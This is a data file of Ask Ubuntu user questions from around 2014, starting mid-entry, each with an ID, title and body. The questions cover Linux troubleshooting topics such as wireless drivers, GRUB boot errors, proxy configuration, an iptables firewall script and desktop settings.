ideas on how i can fix my wireless
482083	print screen short-cut not working ( ubuntu 14.04 lts )	the print-screen short-cut is set to be the print-screen button , but when i press on it , it does not work . any clues ? any help will greatly be appreciated thank you
482088	ubuntu guest to pc connection over serial cable	i want my pc having windows 7 ( teraterm installed ) to talk ( connect ) to my guest vm ( ubuntu os 14.04 ) on another pc . the connection is through an aten usb to serial port convertor . help please ! ! ! !
482089	alx driver not working properly	my alx driver seems to be working fine for everything except apt-get . i can navigate to web pages , the ping command works just fine , but whenever i try to do apt-get update or apt-get install it hangs on trying to connect to whatever archive it 's trying to pull info from . there 's no error message , nothing to imply that it ca n't connect , it just hangs there and does nothing at all . i 've tried re installing alx , upgrading/downgrading my linux kernel , downloading source and building alx from scratch , etc etc but nothing works . does anybody else have this problem/know how to fix it ?
482090	maas and openstack network	trying to figure out the best way for openstack and maas networks to co-exist . assuming maas used 10.0.0.0/24 for provisioning of various openstack nodes , once openstack , with quantum , is deployed should 10.0.0.0 be used as management network , external network , both or discarded ? reason for the question being that i ran a deployment where openstack used 10.0.0.0 as its management network , maas dhcp and dns were active ; however , i could only access vms through namespace and was not able to utilize maas 's dhcp to assign floating ip . ( vms network was through an internal bridge 10.10.10.10 , and external bridge was using the same interface as maas . ) any thoughts or ideas are appreciated .
482091	steam on 64-bit 14.04 : need some help , missing a few 32-bit libs	steam says i 'm missing the following libs , i 'm hoping someone can help me get things in better shape : xyz @ abc : ~ $ steam_runtime=0 steam running steam on ubuntu 14.04 64-bit steam_runtime is disabled by the user error : you are missing the following 32-bit libraries , and steam may not run : libpangoft2-1.0.so.0 libpango-1.0.so.0 libgtk-x11-2.0.so.0 libgdk_pixbuf-2.0.so.0 installing breakpad exception handler for appid ( steam ) /version ( 1401381906_client ) installing breakpad exception handler for appid ( steam ) /version ( 1401381906_client ) [ 2014-06-11 20:45:39 ] startup - updater built may 29 2014 09:19:23 [ 2014-06-11 20:45:39 ] verifying installation ... [ 2014-06-11 20:45:39 ] verification complete [ 2014-06-11 20:45:42 ] shutdown i tried installing the following i386 packages : libpango-1.0-0 : i386 , libpangoft2-1.0-0 : i386 , and libgdk-pixbuf2.0-0 : i386 , and symlinking the .so files ( from usr/lib/i386whatever../ ) into the ~/.local/share/steam/ubuntu12_32/ folder , but was n't able to find the right match for the gtk-x11 lib , and ultimately would up with a different , but still non-working situation . so i 've back-tracked to this point , and have removed those i386 packages for now . it 's worth noting thatsteam runs if i do n't use steam_runtime=0 . also , steam seemed to `` recognize '' the i386 version of the libpango & libpangoft2 libs after i symlinked them into place , during the course of my troubleshooting ; when i would rerun steam_runtime=0 steam , it would n't list those two items as missing anymore . instead though , i had a bunch of gtk-related issues , something about overlay-scrollbar not available , as well as warnings that it ca n't find the murrine engine ... a whole bunch of stuff that sounded like i 'd gone too far down the wrong path . anyhow , any help sorting this out would be appreciated , and thanks !
482092	_.exe install package via wine	in ubuntu , opening an _.exe file with wine windows program loader i get the error message , `` setup ended prematurely because of an error . your system has not been modified . '' what modification is needed ? can i make it work ? the package is to link my ti to my computer . anyone know if i 'll be able to import/export maxima or octave files to the ti ?
482094	add nodes to maas for juju bundle	this question is similar to can juju add-machine be used to prepare a machine for service deployment ? , with some differences ; however . i am trying to find the fastest way of deploying juju bundles on target nodes . i suppose the proper way of doing so is to bring the required number of target nodes to `` ready '' state , and while they are powered off , deploy the bundle , turn the nodes on and let them eventually get to `` allocated '' state . to speed up the process , i typically issue a number of `` juju add-machine '' to upload the desired image to the target nodes that are already in `` ready '' state and let them get allocated . to allow for a bundle to provision existing machines , i then select the allocated nodes and stop them , from maas drop down menu . this puts the desired nodes in `` ready '' state , once again , while powered on . deploying a bundle will provision the nodes , and puts them in `` allocated '' state . this generally works well . the only snag is that upon reboot , target node goes through pxe boot again , wiping out all the charms and juju deamon . is there a better way of doing this ?
482095	restore laptop screen brightness when unlocking screen	my config is the following : - ubuntu 14.04 - an asus laptop - an additional lcd screen connected through vga i control my additional lcd screen 's brightness with dedicated controls located directly on the screen , so that 's not a problem . for my laptop screen , i can use the shortcuts on my keyboard , and i also install the brightness indicator to control this with my mouse . my problem is the following : set laptop brightness to the minimum using either keyboard shortcuts or brightness indicator lock the computer using ctrl+alt+l go for lunch : ) wake up the computer and unlock it â the laptop screen brightness is high and needs to be re-adjusted could it be possible to fix the brightness to a given value all the time ? under `` brightness and lock '' in the system settings , i unchecked `` dim screen to save power '' in order to avoid automatic changes in the screen brightness , but it does n't help . i also tried to directly echo a value in /sys/class/backlight/intel_backlight as seen in other topics , but even in sudo it says i do n't have the permissions to do that ... thanks in advance for your help !
482096	does ubuntu 14.04 support the ubee pxu1900 4g mobile usb dongle ( for clear wireless internet ) ?	i would like to install ubuntu 14.04 on my home laptop , but i use clear wireless as my internet provider . i just booted the ubuntu 14.04 live cd and plugged in my ubee pxu1900 4g mobile usb dongle . the dongle did not appear to activate ( no lights ) and i do n't know where to identify it in ubuntu 's control panels . can someone please guide me in using this dongle to connect to my clear wireless service ?
482098	is it possible to remove nouveau driver from a dual graphics system ? kubuntu 14.04	i 've tried numerous times to get my nvidia card running on ubuntu with no success so far , but that 's ok , i do n't actually need the power nor the advanced graphics that the card provides so i 'll make my peace with it and let that go . the machine in question is a lenovo t440s with dual graphics card , here 's the `` lspci -nnk '' output related to the video adapters : 00:02.0 vga compatible controller [ 0300 ] : intel corporation haswell-ult integrated graphics controller [ 8086:0a16 ] ( rev 0b ) subsystem : lenovo device [ 17aa:220d ] kernel driver in use : i915 04:00.0 vga compatible controller [ 0300 ] : nvidia corporation gk208m [ geforce gt 730m ] [ 10de:1290 ] ( rev a1 ) subsystem : lenovo device [ 17aa:220d ] kernel driver in use : nouveau the problem i 'm facing now is that i 've just made a fresh kubuntu 14.04 install on this machine and almost everything works fine , everything but having multiple monitors . when i connect a new monitor ( either using vga or displayport ) everything works fine and its even able to play sound through the displayport cable , the problem comes when i tried to disable the second monitor using the system setting interface in kde or the special key in the laptop ( f7 ) , when it switches to only one monitor unequivocally my kde session crash and restarts itself leaving me only the choice to unplug the monitor physically . the only message i can get when that happens is : nouveau e [ pibus ] [ 0000:04:00.0 ] gpc0 : 0x4188ac 0x00000001 ( 0x1e70822e ) i understand nouveau is the open source driver for the nvidia card but i was wondering if it is possible to eliminate the nouveau drivers from my system since i do n't really need to use the nvidia adapter and if that 's possible how can i do it safely . and in a related question , do you guys think that that could help me with my issue ? worth mention that i 've tried ubuntu 14.04 ( unity ) , ubuntu gnome 14.04 and even fedora gnome 20 ( all of them fresh installations ) on this very same pc and neither one showed the problem i 'm portraying in here . thank you very much for your attention , have a good one !
482102	gnu grub version 2.02 beta 2-9	i attempted to load windows 8 and ubuntu alongside each other and it was working well until my ubuntu installation completed and i restarted the computer . now i ca n't get past this error : â minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions . grub > how do i fix this ? i 'm not a computer person . talk me through it . : -/
482103	where to see the complete list of juju charms available ?	that sounds like such a basic question to ask , but i ca n't seem to find a good answer . where to see the complete list of juju charms available ? except for the official 'juju charms store ' website which is , in my opinion , totally unusable ( and search does n't work for me ) , i ca n't seem to find anything . i would like to have something like npm repository search where i can see all packages available and search through them in a convenient way . for now all that i can see are : juju charms store ( and search does n't work for me ) a mirror of charms on github ( but i ca n't seem to find out how good , accurate , recent is the list , 'nginx ' charm is n't in the list for example , which is odd )
482106	how can i get the list of contacts in an html5 ubuntu touch app	i 'm trying to list all contacts using the ubuntu touch sdks . by reading the doc it seems like i need to use the contenthub but i ca n't seem to get anywhere . i plan on using the api.importcontent ( type , peer , transferoptions , onerror , onsuccess ) but i need a peer value first here is what i have so far . window.onload = function ( ) { var ui = new ubuntuui ( ) ; ui.init ( ) ; document.addeventlistener ( `` deviceready '' , function ( ) { console.log ( 'loaded ' ) var api = external.getunityobject ( '1.0 ' ) ; var hub = api.contenthub ; var contactcontenttype = hub.contenttype.contacts ; hub.getpeers ( { contenttype : contactcontenttype , handler : 'destination ' } , function ( handlers ) { console.log ( handlers ) } ) } , false ) ; } ; i do see the console log for 'loaded ' but the callback seems to never return anything . useful link http : //developer.ubuntu.com/api/html5/sdk-14.10/contenthub.contenthub/ # methods
482107	troubleshooting on internet navegation with kubuntu 14.04 lts	recently , i upgraded my kubuntu 12.04 lts to 14.04 lts on my laptop . now , my access to internet with wifi is kind of slow , and sometimes on firefox or chrome , the page is reloaded , but it only happens curiosly on wifi , not while i 'm wired . i suppose it 's because of the driver of my `` qualcomm atheros ar5007eg '' wireless network card , because kubuntu uses `` qualcomm atheros ar242x / ar542x drivers '' , and it seems people had problems with these cards . the thing is that i do n't know why this happens or how to solve it . does somebody knows a solution for this ?
482108	how to list all directories and a specific line inside a file in that directory	my server has hosted many websites for testing/dev purposes . my problem is that my mysql server has around 95 % load . so , i want to list all the directories and the db lines from config.php . things like like foo-dev : db @ mysql01
482110	gcc 4.8.1 to gcc 4.6.3	i am using ubuntu 12.04 . initially ubuntu 12.04 have gcc 4.6.3 with it . i upgraded it to 4.8.1 . but now one of my application that was working fine with 4.6.3 are not working with 4.8.1 . i want to downgrade it to 4.6.3 .
482111	i triple booted windows 8 with ubuntu 14.04 and pear os 8 ... but then i ran into a big problem	i first installed the ubuntu . then i partitioned my hard drive and i installed the pear . finally the last operating system that i wanted to install was windows 8 , so i did so . however now that i installed the windows 8 there is no grub screen or any boot screen it just goes straight to windows 8 . is there a way to somehow fix this ... because it 's like i do n't have any other operating systems on my computer now ... i 'm not sure what to do .
482113	how do you change qt themes by hand ?	i am running a light desktop with fluxbox and trying not to install anything more than i absolutely have to . i was wondering how one would go about changing qt4 and qt5 themes by hand much like you would by altering the ~/.gtkrc-2.0 and ~/.config/gtk-3.0/settings.ini files for gtk themes ?
482115	ati xpress m 200 and new mesa . why new mesa is slower ?	my situation looks pretty bad . the old mesa ( 8.0.4 ) worked fine on 12.04 . when made an update on my new 14.04 , all hell broke loose ! from 90 fps on glxgears it went to 60 . looks like not a large amount but the card ca n't handle even quake 3 . why i wont install the proprietary driver ? the answer is simple . it do not work at all on my pc . tried many times and it did n't work at all . mesa driver version that worked fine was 8.0.4 . the version that is normally in ubuntu 14.04 repo is 10.1 . i was thinking that it was bugged , so i 've got a ppa repo , added it , installed new mesa , restarted and nothing changed ( mesa version is now 10.3 ) . what i 'm doing wrong ? maybe i 'm installing both drivers not in a proper way ? or is it a mesa bug ?
482116	number of users connected to hotspot	i see that after a point , my comp does n't allow more users to get added to my hotspot connections . is it restricted because of hardware or because of software ? what is the maximum number of users that can be supported by the hardware ? thanks in advance .
482120	cfg80211 | mac80211 : module has bad taint , not creating trace events	i have those massages on boot : cfg80211 : module has bad taint , not creating trace events mac80211 : module has bad taint , not creating trace events and wifi does n't work of course . how can i `` reinstall '' those modules , or fix it in some other way ? uname : linux pc 3.13.0-27-generic # 50-ubuntu smp thu may 15 18:08:16 utc 2014 i686 i686 i686 gnu/linux thank you very much in advance
482123	how can i safety install ubuntu alongside windows without automatically creating a swap partition ?	i want to use a swap file instead of partition . i do n't have any experience in using partition manager . i do n't want to lose my current data on disk . i tried wubi before and got a bad experience .
482126	system wide proxy settings when on a windows network with a password	i 'm using ubuntu on a windows network . i want to connect to the world wide web . i have followed the steps here which i have found very useful . however when i try to ping a website ( eg : ping www.wikipedia.org ) i get no reply . i can ping local computers on my network , but i need to go through our proxy to get to the world wide web . i can even browse wikipedia using firefox , i just needed to enter the proxy configuration script location and my username and password . i 'm quite sure the reason i 'm having this trouble is because i hav n't entered a username and password . i 'm not sure how to do this on a system wide level . ultimately i would like to be able to use package managers like synaptic but first i need them to be able to connect to the internet . edit as sugested i created a /etc/apt/apt.conf file like acquire : :http : :proxy `` http : //chrisav : password @ myproxy.com.au:8080 '' ; acquire : :https : :proxy `` https : //chrisav : password @ myproxy.com.au:8080 '' ; acquire : :ftp : :proxy `` ftp : //chrisav : password @ myproxy.com.au:8080 '' ; acquire : :socks : :proxy `` socks : //chrisav : password @ myproxy.com.au:8080 '' ; however i still cant ping wikipedia when i try installing stuff i get chris @ chris-ubuntu : ~ $ sudo apt-get install kate reading package lists ... done building dependency tree reading state information ... done e : unable to locate package kate
482130	how to keep more than 2 log files ?	in search of occasional boot problems , i would like to keep in the log files more than 2 ones that are kept now . for example , in /var/log , i have xorg.0.log and xorg.0.log.old that are created by two boot ups and i need to keep track of for example last 10 log files . similar for other main log files like dmesg ( now it is dmesg and dmesg.0 ) .
482132	ipod sync rythmbox not working	while i know there is a wide array of logistical problems that come with the territory , i am presently unable to find nay help with my particular problem . presently i am using a jailbroken ipod touch 4g with ios 6.1.6. and using ubuntu 12.04 after researching how to sync my ipod here i was unable to get any results . after getting ready to sync the sync window displays that my ipod is full , despite that there is 24 gigs available . i was thinking that perhaps this has something to do with the fact that it is jailbroken but i have read other places that it still might be possible to sync . i would like to keep the apps i have installed already , so wiping the ipod is not an attractive option .
482143	how to configure 2 lan cards ?	i have ubuntu 14.04 installed on my system and i make it as a server in my office with having 15 employees working . i have 2 lan cards in my system : one for input from router to my ubuntu server other one from my system to a switch , which connects all my employees from through that switch via lan cables . now , how can i configure my both lan cards , as i wants to block some sites and make some restriction on the network .
482145	why are imagemagick and shotwell both pre-installed ?	their jobs are pretty much the same right ? i want to uninstall useless programs . but i fear i may lose important things . i have gimp and inkscape installed though .
482146	how to install new intel ethernet driver	ubuntu 12.04 x64 does n't recognize newest intel ethernet adapter on my desktop ( intel ethernet connection i217-v ) . i downloaded required driver from intel and compiled it using make . now i have : alex @ alex64-six : ~ $ find / -name 'e1000e.ko ' 2 > /dev/null /home/alex/documents/intelethernetdriver/e1000e-3.0.4/src/e1000e.ko /lib/modules/3.2.0-64-generic/kernel/drivers/net/ethernet/intel/e1000e/e1000e.ko the first line is new driver compiled from intel sources . the second line is probably existing driver from ubuntu distribution , which does n't recognize new ethernet adapter . how can i apply the new driver instead of existing one ? any other solution is welcome . for now , i can not upgrade to latest ubuntu release , because i use some third-party products .
482151	which ubuntu package contains the default mouse cursor ?	which ubuntu package installs/uninstalls the default mouse cursor pointer ?
482154	usb devices not work after installation of ubuntu 14.04	i installed lubuntu14.04 with usb mouse /kb and usb key with no problem . after installation , ive no mouse , no keyb , no access to usb key , no network . i plug a ps2 keyb for first diagnostic . lsusb shows that devices are detected , but they do n't runs did you have idea to help me ? thanks in advance jp
482156	creating routes using iptables in ubuntu 14.04	i 'm a newbie at ubuntu 's administration although i 've been using linux for a while just at user level . let 's show my problem . this is my network ( only static ip addresses are used , for both private and public ones ) : lan1 : 128.100.100.0/24 | | l_____128.100.100.30 router l_____192.168.110.1 | | lan2 : 192.168.110.0/24 | | l__ linux box ubuntu server 14.04 named atlas : 2 ethernet interfaces l__ eth0 : internet 193.144.186.15/24 ( default gateway is 193.144.186.1 ) l__ eth1 : lan 192.168.110.11/24 iptables are used to configure atlas 's firewall . all communications between lan2 and atlas or lan2 and internet work out fine . no routes are defined via the route command . the issue is as follows : a single ping sent from host 128.100.100.1 ( remote1 ) to 192.168.110.11 ( atlas 's eth1 ) does n't work . actually , the icmp request correctly arrives atlas 's eth1 interface ( i checked with wireshark at eth1 ) , but no icmp reply is sent from atlas to remote1 . however , if one route is added in atlas , the ping request is correctly replied . here is the route ( informing about which is the router to reach the inner 128.100.100.0 network from atlas ) : route add -net 128.100.100.0/24 gw 192.168.110.1 dev eth1 you may say that , if it works , it all is ok , but my challenge is not to use the routecommand , but to use only iptables rules to make things work between both lans ( 128.100.100.0 and 192.168.110.0 network ) . my iptables rules are based on an example by oskar andreasson at https : //www.frozentux.net/iptables-t ... c.firewall.txt my question is : is it possible to achieve what i want using only iptables ? or is it impossible and imust use route command ? here it is the iptables script executed on boot . thank you . rober # reset tables/chains/rules $ iptables -f $ iptables -x $ iptables -t nat -f $ iptables -t nat -x $ iptables -t mangle -f $ iptables -t mangle -x # 4.1.1 set policies $ iptables -p input drop $ iptables -p output drop $ iptables -p forward drop # 4.1.2 create userspecified chains $ iptables -n bad_tcp_packets $ iptables -n allowed $ iptables -n tcp_packets $ iptables -n udp_packets $ iptables -n icmp_packets # 4.1.3 create content in userspecified chains # bad_tcp_packets chain $ iptables -a bad_tcp_packets -p tcp -- tcp-flags syn , ack syn , ack -m state -- state new -j reject -- reject-with tcp-reset $ iptables -a bad_tcp_packets -p tcp ! -- syn -m state -- state new -j log -- log-prefix `` new not syn : '' $ iptables -a bad_tcp_packets -p tcp ! -- syn -m state -- state new -j drop # allowed chain $ iptables -a allowed -p tcp -- syn -j accept $ iptables -a allowed -p tcp -m state -- state established , related -j accept $ iptables -a allowed -p tcp -j drop # tcp rules # ftp $ iptables -a tcp_packets -p tcp -s 0/0 -- dport 21 -j allowed # ssh $ iptables -a tcp_packets -p tcp -s 0/0 -- dport 22 -j allowed # http # $ iptables -a tcp_packets -p tcp -s 0/0 -- dport 80 -j allowed # webmin $ iptables -a tcp_packets -p tcp -s 192.168.0.0/16 -- dport 10000 -j allowed $ iptables -a tcp_packets -p tcp -s 193.144.201.0/24 -- dport 10000 -j allowed # samba tcp ports : 139 , 445 ( from inner lan ) $ iptables -a tcp_packets -m state -- state new -m tcp -p tcp -s 192.168.0.0/16 -- dport 139 -j accept $ iptables -a tcp_packets -m state -- state new -m tcp -p tcp -s 192.168.0.0/16 -- dport 445 -j accept # samba tcp ports : 139 , 445 ( from internet ) $ iptables -a tcp_packets -m state -- state new -m tcp -p tcp -s 193.144.201.0/24 -- dport 139 -j accept $ iptables -a tcp_packets -m state -- state new -m tcp -p tcp -s 193.144.201.0/24 -- dport 445 -j accept # udp ports # samba udp ports : 137 , 138 ( from inner lan ) $ iptables -a udp_packets -p udp -m udp -s 192.168.0.0/16 -- dport 137 -j accept $ iptables -a udp_packets -p udp -m udp -s 192.168.0.0/16 -- dport 138 -j accept # samba udp ports : 137 , 138 ( from internet ) $ iptables -a udp_packets -p udp -m udp -s 193.144.201.0/24 -- dport 137 -j accept $ iptables -a udp_packets -p udp -m udp -s 193.144.201.0/24 -- dport 138 -j accept # accept echo request $ iptables -a icmp_packets -p icmp -s 0/0 -- icmp-type 8 -j accept # accept ttl exceeded $ iptables -a icmp_packets -p icmp -s 0/0 -- icmp-type 11 -j accept # 4.1.4 input chain # bad tcp packets we do n't want. $ iptables -a input -p tcp -j bad_tcp_packets # rules for special networks not part of the internet $ iptables -a input -p all -i $ lan_iface -s $ lan1_ip_range -j accept $ iptables -a input -p all -i $ lan_iface -s $ lan2_ip_range -j accept $ iptables -a input -p all -i $ lo_iface -s $ lo_ip -j accept $ iptables -a input -p all -i $ lo_iface -s $ lan_ip -j accept $ iptables -a input -p all -i $ lo_iface -s $ inet_ip -j accept # special rule for dhcp requests from lan , which are not caught properly # otherwise . $ iptables -a input -p udp -i $ lan_iface -- dport 67 -- sport 68 -j accept # rules for incoming packets from the internet . $ iptables -a input -p all -d $ inet_ip -m state -- state established , related -j accept $ iptables -a input -p tcp -i $ inet_iface -j tcp_packets $ iptables -a input -p udp -i $ inet_iface -j udp_packets $ iptables -a input -p icmp -i $ inet_iface -j icmp_packets # log weird packets that do n't match the above . $ iptables -a input -m limit -- limit 3/minute -- limit-burst 3 -j log -- log-level 7 -- log-prefix `` ipt input packet died : `` # 4.1.5 forward chain # bad tcp packets we do n't want $ iptables -a forward -p tcp -j bad_tcp_packets # accept the packets we actually want to forward $ iptables -a forward -i $ lan_iface -j accept $ iptables -a forward -m state -- state established , related -j accept # log weird packets that do n't match the above . $ iptables -a forward -m limit -- limit 3/minute -- limit-burst 3 -j log -- log-level 7 -- log-prefix `` ipt forward packet died : `` # 4.1.6 output chain # bad tcp packets we do n't want . $ iptables -a output -p tcp -j bad_tcp_packets # special output rules to decide which ip 's to allow. # $ iptables -a output -p all -s $ lo_ip -j accept $ iptables -a output -p all -s $ lan_ip -j accept $ iptables -a output -p all -s $ inet_ip -j accept # log weird packets that do n't match the above . $ iptables -a output -m limit -- limit 3/minute -- limit-burst 3 -j log -- log-level 7 -- log-prefix `` ipt output packet died : `` # 4.2 nat table # 4.2.4 prerouting chain # dns ( from 192.168.0.0/16 or 128.100.100.0/24 ) $ iptables -t nat -a prerouting -i $ lan_iface -p udp -s 0/0 -- destination-port 53 -j dnat -- to-destination $ dns_server # 4.2.5 postrouting chain # enable simple ip forwarding and network address translation $ iptables -t nat -a postrouting -o $ inet_iface -j snat -- to-source $ inet_ip
482158	ca n't install ubuntu in lenovo u430 touch	i am trying to install ubuntu on my laptop u430 lenovo . tryied any configuration at bios but still boots in windows . the ubuntu installation menu does n't show up and in a few seconds windows pop up . any hint ? thanks in advance
482163	unity autostart hides dropbox icon while manual start does not	ubuntu 12.04 lts . for information : autostart works , and dropbox is active item in startup applications . libappindicator1 is installed nautilus-dropbox reinstalled several times dropbox works , icon is visible only when started manually . no tray whitelist manipulation is done , and no is wanted because whitelisted dropbox provides menu which does not have unity theme . the wrong behavior started after about 3 months of correct starting , so there had to be something what trigered the wrong behavior . after login : in unity ... dropbox icon is missing . but dropbox is running and aparently works . ps -u `whoami` | grep dropbox 3433 ? 00:00:03 dropbox manual restart in terminal dropbox stop ; dropbox start dropbox daemon stopped . starting dropbox ... done ! ... now unity panel shows the icon , the menu has unity theme . the same correct behavior if i run dropbox.desktop by clicking in ~/.config/autostart ( after setting executable bit ) . why unity prevents dropbox icon to show after autostart startup and does not prevent it when run by hand ? is it some timing during session init ? the dropbox entry in startup applications ( autostart ) was inserted via `` dropbox autostart '' . all is done by proper installation . i must do `` dropbox stop ; dropbox start '' after login to show the icon in tray . post answer note : at last , after having used the war suggested in answer , i found on another computer with the same problem that the cause ( or one of causes ) was xfce desktop . after full removal of xfce desktop , the dropbox icon started to be visible again .
482166	how to automatically reboot my pc every 3 hours ?	my pc runs a program when it boots . sometimes the program stops working after a few hours , but it will work fine when it reboots . so , i want to schedule my pc to reboot every 3 hours to prevent the program to be stopped . i 'm using ubuntu 14.04. edit : the program does n't stop , it just does n't work with the maximum power of the pc but i need it to work with full power .
482170	asus pce-ac66 & bcmwl-kernel-source : unstable connection with frequent disconnections	yesterday i bought myself new wi-fi adapter ( asus pce-ac66 ) . it works perfect on windows 7 , but today i tried to use it with fresh installation of kubuntu 14.04 , and it 's a complete nightmare . i installed bcmwl-kernel-source , connected to my home network , but connection is not stable , there are 'waves ' of connection - at one period of time everything works great with perfect speed but several moments after it seems there is no connection at all . and sometimes it is even written that connection is deactivated . what can be the reason ? please help ! thanks in advance . nm-tool output : state : connected ( global ) - device : wlan0 [ asus ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : wl state : connected default : yes hw address : 60 : a4:4c : db:05:6c capabilities : speed : 39 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) 998 : infra , 20 : cf:30:88 : ec : f2 , freq 2437 mhz , rate 54 mb/s , strength 50 wpa asus : infra , 74 : d0:2b:3f:43:3c , freq 5180 mhz , rate 54 mb/s , strength 24 wpa2 dir-615 : infra , c4 : a8:1d:44:33:66 , freq 2422 mhz , rate 54 mb/s , strength 42 *asus : infra , 74 : d0:2b:3f:43:38 , freq 2412 mhz , rate 54 mb/s , strength 52 wpa2 beeline-10 : infra , 2c : ab:25:00 : d3:57 , freq 2412 mhz , rate 54 mb/s , strength 45 wpa ipv4 settings : address : 192.168.1.111 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.1 dns : 192.168.1.1 - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : e1000e state : unavailable default : no hw address : 14 : da : e9:09:60 : e4 capabilities : carrier detect : yes wired properties carrier : off
482171	want to upgrade my inspiron 7520 to ubuntu 14.04 but dual video cards is a problem	i have inspiron 7520 . rig is : processor : intel® core™ i7-3612qm cpu @ 2.10ghz × 8 , ram : 8gb , graphics : intel hd 4000 ( cpu ) , amd radeon 7730m ( gpu ) under 64bit os . my problem here is switchable graphics . i have certified ubuntu 12.04.1 for inspiron 7520 installed on my laptop computer and it works great . i just want to upgrade to ubuntu 14 but when i tried it , hybrid graphics became problem . i installed drivers ( from both amd 's catalyst and intel 's ) , tried all three additional drivers in system settings but it had no use for me , i even could n't turn brightness off . then i used some `` terminal- > sudo gedit '' stuff but it caused to fail to detect video , input devices etc , so i live-booted ubuntu and undid sudo-gediting . my point is that , everything in google did n't work so i reinstalled certified ubuntu . as i understand , dual-graphics ( or `` hybrid video '' ) is still a problem for over 2 or 3 years ( not only in ubuntu ) , but when dell wanted to solve it , they solved it . and i do not want to get tired . so my question is , what should i do with hybrid video and desire of ubuntu ? should i wait for ubuntu 12.04 to notify me that there is 14.04 , or what should i do ?
482172	shutdown -h on a vm does n't switch off the vm	as i do n't normally use any linux distro outside a vm , i 'm not sure whether this is the expected behavior . when i use the shutdown -h param i always get the distro to halt as expected , but the vm ( virtualbox ) does n't suspend the machine . instead it keep it running . is this the expected behavior , or there is something wrong with my vm ? thanks
482173	removing a module when i add a new better one ?	i 'm using this guide to install my tl-wn822n ( wireless/wifi ) . i need to add 8192cu at the end of /etc/modules , but i see another module there ( copy-paste file ) : # /etc/modules : kernel modules to load at boot time . # # this file contains the names of kernel modules that should be loaded # at boot time , one per line . lines beginning with `` # '' are ignored . # parameters can be specified after the module name . lp 8192cuvhba vhba should i remove it or is that unnecessary ? thanks for any help !
482175	zentyal - one user can not samba share under 'networks '	i use zentyal 3 i believe . it 's been a very long time since i installed zentyal or tinkered with it , so i ca n't remember how i allow access to the samba share . should n't the user at least be able to see the host , even though he ca n't access it ? others on the network can access the samba share just fine .
482176	best dual boot setup	my professor told me that partitioning hard drive is not recommended . it is better to have two separate drives , especially for dual boot system . now , i will have one ssd and one hdd in my laptop . which is better ? install linux and windows in ssd ( partitioned ) then data drive for hdd or ... install ubuntu in ssd . install windows in hd , partitioned with data . and why ?
482179	how to change key binding for tmux	i want to change the key binding in tmux so i can use ctrl + alt instead of ctrl + b this is my ( unfortunately ) not working try to do so . unbind c-b set -g prefix m-c what 's wrong with this ? i thought i followed the documentation for the keys .
482180	unable to remove a file which has a name like a command argument	i inadvertently created a file called -r in my home directory . now i can not get rid of it : rm -rf rm : missing operand try 'rm -- help ' for more information . other attempts : rm /-/r rm : can not remove â/-/râ : no such file or directory another one : rm \-r rm : missing operand try 'rm -- help ' for more information . is there a way to remove this file without deleting the whole directory ?
482192	how to autostart kupfer in ubuntu 13.10 ?	i built kupfer from source on ubuntu 13.10 and installed it into ./local . in the preferences i checked start automatically on login . however , kupfer does not automatically start . the desktop file in ~/.local/share/applications/kupfer.desktop looks like this : [ desktop entry ] version=1.0 name=kupfer name [ cs ] =kupfer name [ da ] =kupfer name [ de ] =kupfer name [ el ] =kupfer name [ es ] =kupfer name [ eu ] =kupfer name [ fr ] =kupfer name [ gl ] =kupfer name [ hu ] =kupfer name [ it ] =kupfer name [ ko ] =쿠퍼 name [ nb ] =kupfer name [ nl ] =kupfer name [ pl ] =kupfer name [ pt ] =kupfer name [ pt_br ] =kupfer name [ ru ] =kupfer name [ sl ] =kupfer name [ sv ] =kupfer name [ tr ] =kupfer name [ zh_cn ] =kupfer genericname=application launcher genericname [ ca ] =llançador d'aplicació genericname [ cs ] =spouštěč aplikací genericname [ da ] =programopstarter genericname [ de ] =anwendungsstarter genericname [ el ] =εκκινητής εφαρμογής genericname [ es ] =lanzador de aplicaciones genericname [ eu ] =aplikazioen abiarazlea genericname [ fr ] =lanceur d'applications genericname [ gl ] =iniciador de aplicativos genericname [ hu ] =alkalmazásindító genericname [ it ] =lanciatore di applicazioni genericname [ ko ] =응용 프로그램 실행 아이콘 genericname [ nb ] =programstarter genericname [ nl ] =programmastarter genericname [ pl ] =aktywator programów genericname [ pt ] =lançador de aplicações genericname [ pt_br ] =lançador de aplicativos genericname [ ru ] =средство запуска приложений genericname [ sl ] =zaganjalnik programov genericname [ sv ] =programstartare genericname [ tr ] =uygulama çalıştırıcı genericname [ zh_cn ] =程序启动器 comment=convenient command and access tool for applications and documents comment [ cs ] =nástroj pro pohodlné provádění příkazů a přístup k aplikacím a dokumentům comment [ da ] =nemt kommando- og adgangsværktøj til programmer og dokumenter comment [ de ] =praktisches befehls- und zugriffswerkzeug für anwendungen und dokumente comment [ el ] =βολικό εργαλείο εντολών και πρόσβασης για εφαρμογές και έγγραφα comment [ es ] =herramienta para acceso y manejo de aplicaciones y documentos comment [ eu ] =komando eta atzipen tresna egokia aplikazio eta dokumentuentzat comment [ fr ] =outil pratique pour accéder à des documents et lancer des applications comment [ gl ] =ferramenta cómoda para controlar e acceder a aplicativos e documentos comment [ hu ] =kényelmes parancs és hozzáférési eszköz az alkalmazásokhoz és dokumentumokhoz comment [ it ] =comodo comando e strumento di accesso per applicazioni e documenti comment [ ko ] =편리하게 응용프로그램이나 문서에 접근하고 명령을 내릴 수 있는 도구 comment [ nb ] =praktiskt kommandoverktøy for programmer og dokumenter comment [ nl ] =handige opdracht- en toegangshulp voor programma 's en documenten comment [ pl ] =wygodne narzędzie do uruchamiania programów i otwierania dokumentów comment [ pt ] =ferramenta conveniente para acesso e gestão de aplicações e documentos comment [ pt_br ] =uma conveniente ferramenta de comando e acesso para aplicativos e documentos comment [ ru ] =удобный инструмент для быстрого доступа к программам и документам comment [ sl ] =prikladno orodje za izvajanje ukazov in dostopa do programov in dokumentov comment [ sv ] =praktiskt kommandoprogram för åtkomst av program och dokument comment [ zh_cn ] =方便的命令和操作程序或文档的工具 icon=kupfer exec=python /home/user/.local/share/kupfer/kupfer.py % f type=application categories=utility ; startupnotify=true x-userdata= $ config/kupfer ; $ data/kupfer ; $ cache/kupfer terminal=false
